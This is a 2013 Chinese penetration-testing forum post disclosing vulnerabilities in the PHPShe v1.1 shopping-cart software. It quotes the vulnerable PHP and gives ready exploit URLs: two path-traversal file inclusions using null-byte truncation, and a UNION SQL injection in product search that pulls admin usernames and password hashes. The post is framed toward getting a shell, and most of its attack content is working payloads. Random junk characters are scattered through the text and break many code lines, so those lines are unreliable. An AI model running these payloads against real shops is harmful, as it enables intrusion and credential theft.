中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/- D2 |& }/ Q% X, N
/* Phpshe v1.1 Vulnerability
9 {5 O0 \7 w& \/* ========================1 K6 u- S: b: k$ B* L0 C! v
/* By: : Kn1f3
( q5 t( K" o, U  D  ?: e3 z3 g. ]/* E-Mail : 681796@qq.com
- y( o4 x, N/ v9 I* x9 \/*******************************************************/( N# B, c& P. j5 l8 J  C
0×00 整体大概参数传输
8 |/ L: S2 C3 K; B, h. f* x
1 |* G/ N- n: P6 S8 c7 Z  L
7 A2 n( b! y$ ?5 G% w: [1 U4 B4 ~  U# @7 Z. f4 }1 F$ f8 A# D
//common.php
9 x5 L2 L! K6 Y* r  t( `if (get_magic_quotes_gpc()) {. n& H3 n+ ^: S5 k# ?5 B1 F
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');6 }9 C8 F* J" Q7 e/ B
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
# a) x4 C& W8 g! o. G: x) q}! l. }- \, m/ U
else {7 r) E, c$ c( J, l, d( c! |! V
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
9 V+ ?; c- A4 X!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');" L  y2 \+ A4 g
}
/ Q; i6 i1 ]$ g* c( e$ q" nsession_start();
1 }4 U' f9 Q' }' j" S!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
. }' m$ f0 N# r9 l5 E6 z!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
' _2 a) s; N  a0 S* b1 r3 v1 f" u: x- T5 y% m9 Q* z
0×01 包含漏洞
4 W7 j/ \+ Y$ z. v- b" J+ {) u ( c4 p6 l* K6 @2 T/ @5 `

/ w& L* n8 z3 K0 x5 B. M//首页文件
% O$ f7 V( l, N" m% r; s<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
$ H0 f8 n& w8 m7 dinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
, h. J9 K$ X) T. ^  {3 ype_result();
0 |- p8 o+ v1 }?>1 X8 i3 [. j# m' E& K7 f8 V( u; v7 P
//common 文件 第15行开始0 p* U( Y3 Z# `# f1 S4 E# o% X# }
url路由配置, ^7 N" K+ B2 _) M. A
$module = $mod = $act = 'index';! k: ?. \0 e, t. P4 a
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
; D7 v4 m+ W4 L% j3 h$ @; y$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);7 ?) p" ?5 F+ o1 X
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);+ w5 Z* _- ^+ Z. ]+ p( Y/ E
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%004 i, \4 ]" Q: S$ E


7 y6 y/ W& c: [, d& ?3 t; L
  V- c3 n- H% b, Q- j 0×02 搜索注入
& y  m2 K; \0 H6 P  g * S8 {, O, ], T% F# E7 H
<code id="code2">

//product.php文件
; c+ q2 t& l3 Q( l1 V2 |case 'list':
6 d* k7 y' c- N; K5 I1 D' ]! ]: ?2 ?$category_id = intval($id);# Z- V8 F- s6 x
$info = $db->pe_select('category', array('category_id'=>$category_id));$ i+ Q& \* v" O" G- }0 b% e
//搜索3 W2 n- n! A" r3 {4 X0 J8 r
$sqlwhere = " and `product_state` = 1";: G. G) K1 o. g/ H! ]; O
pe_lead('hook/category.hook.php');( n5 N1 T9 L1 U- R) q, ~
if ($category_id) {
, m: n: a1 y. V% y4 r3 C" nwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
. o# k% s2 g+ e. o3 H5 H}
( l) [* c6 H) J  N1 N3 q; `% ]$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
* z7 _1 c: l6 s( x1 I+ m: Wif ($_g_orderby) {$ s: F  {# P) c. k) ~
$orderby = explode('_', $_g_orderby);% D: T5 E/ W0 q" i. u* z: ~# V
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
7 a% i+ p7 H) q}
- a  w7 `/ G! c" R4 R) Uelse {
0 b/ i/ f" j3 L4 g1 C$sqlwhere .= " order by `product_id` desc";/ A* B) I+ v$ m6 A; o8 G1 l
}
$ |) @$ u$ V  }" H! O1 L$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
9 ]4 A* s# L1 X/ U0 o, \9 q//热卖排行+ ?- s& M+ i! |2 W# J% L& u
$product_hotlist = product_hotlist();
2 E: E* a7 E) N! B& o  n. e. k! Z: _//当前路径
* ~5 _. y5 Q. D5 l3 x$nowpath = category_path($category_id);
3 r6 c, d& l  L5 J# }# p0 L! ~$seo = pe_seo($info['category_name']);
8 Z) d4 J0 z  j) r# a2 vinclude(pe_tpl('product_list.html'));7 G8 u9 ?0 e1 Q8 [# I( v
//跟进selectall函数库
$ _/ E/ C; ?; x' ?2 s/ Lpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())$ |& C  T" u6 i# P( F& i; x4 U  t
{
7 k/ E& ?# |6 e, \) O//处理条件语句) y. y! B0 C& P8 C% x; j6 L
$sqlwhere = $this->_dowhere($where);; x0 e9 Y" C# C/ z- P* V  Z# B! r
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);' [4 O# X0 w8 Y3 I% w
}( ]% d; q+ I' M8 x
//exp5 Y$ y) t2 C$ D, j) ^- _' a
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
0 S6 Y8 O( K3 O- |

</code>4 O# d& z1 J6 M- L

8 Z$ Y& k: w% P! [+ d0×03 包含漏洞2
8 H$ i: G6 a: w* c- r
" A2 E0 k6 [) i9 H<code id="code3">

//order.php

case 'pay':

5 S; \; {  ~+ m7 l. l  N7 b9 K' [
$order_id = pe_dbhold($_g_id);

% o5 d- u6 j' l2 Y( D- {  f
$cache_payway = cache::get('payway');

1 h9 Q  @) C2 k. `  H% l
foreach($cache_payway as $k => $v) {


# o& }7 @2 U4 X# q1 z( S$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


3 \7 |& a6 C2 @if ($k == 'bank') {

. n# J: q" p$ ?1 [8 I5 b
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


- t, D8 R$ H, F7 Q$ d5 ?- A}


& Z# f: E2 O5 ]" N4 h1 l}

2 {8 `9 a8 c& \7 e5 U. E5 K# R7 Y
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


" m6 k$ T5 e$ @: A% H& o2 w!$order['order_id'] && pe_error('订单号错误...');

# V. e+ \1 |4 R; v) L- _
if (isset($_p_pesubmit)) {


# t7 P$ x- ?" d- l. Z! i! Oif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

# o. m% |, T5 _0 d+ U! A
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


: f  X: e0 |6 I, C, {foreach ($info_list as $v) {

# d( Y" r/ l, d, _
$order['order_name'] .= "{$v['product_name']};";
+ x% R  U$ N, b5 c

4 T/ m  ?% z9 s- r  k- Y
}

. n7 ~6 A* L1 A1 G! e
echo '正在为您连接支付网站,请稍后...';

! b2 D! h9 z. I/ H( A
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


  ]1 c  G+ u* i6 D" ~) ~3 {}//当一切准备好的时候就可以进行"鸡肋包含了"

- u8 e3 `/ q# u* o4 k
else {

( f2 X' q2 o2 Z/ ~* v
pe_error('支付错误...');


0 C$ b3 f. O2 K3 h  i& k}

* b- l% \  j3 o: B
}

0 Q# N; `1 o% C7 G4 I3 Q
$seo = pe_seo('选择支付方式');

+ H$ c9 x$ P5 L  x6 G. e
include(pe_tpl('order_pay.html'));


0 @2 R8 P+ B# e3 i1 g" R" v: obreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>; V% e* @: \: ~# B$ j1 @




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2